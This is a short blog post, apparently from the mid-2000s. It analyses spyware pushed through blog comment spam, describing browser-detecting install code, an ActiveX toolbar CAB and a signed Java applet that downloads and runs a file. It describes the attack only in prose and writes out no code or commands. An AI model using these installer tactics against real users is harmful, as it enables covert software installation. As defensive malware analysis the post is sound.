Historically, blog spam has been used to raise search engine rankings. However, with the recent introduction of the “nofollow” directive this avenue of profit has been essentially killed off. So now comment spammers are moving over to a new area of profit: spyware (phishing and other similar stuff will probably follow). While there have been reports of spyware in Google’s Blogger service, triggered by the “next blog” feature; I haven’t yet seen reports of trackback or comment spam doing the same. Well until now.
What follows is something very interesting. The main download function in this file, checks for Internet Explorer SP2 and not, AND for Netscape/Firefox. For IE, an ActiveX control is loaded which presumingly downloads and installs the toolbar (I am running Linux so I can’t test it). The file download is called “ysb_regular.cab” and contains a single DLL file called “ysbactivex.dll” which is probably the toolbar itself.
Is there an exploit here? I don’t see it. After more than adequate warning, Java allowed the user to run arbritrary code. Arbitrary code can do, well, arbitrary things.
What was interesting to me is that they use the Firefox/Netscape Install API among other things to try to install it. However, at least on my install of Firefox I had to add the site to the list of allowed site before the install could even take place. So even safeguards are in place for this.
Moving along to the actual Java installer, I uncompressed it and decompiled it with JAD. The actual installer creates a temporary file, downloads something into it and then executes it. The applet is signed by Thawte and I assume that saying “Yes” to the Java warning will give it full permissions to do its dirty work.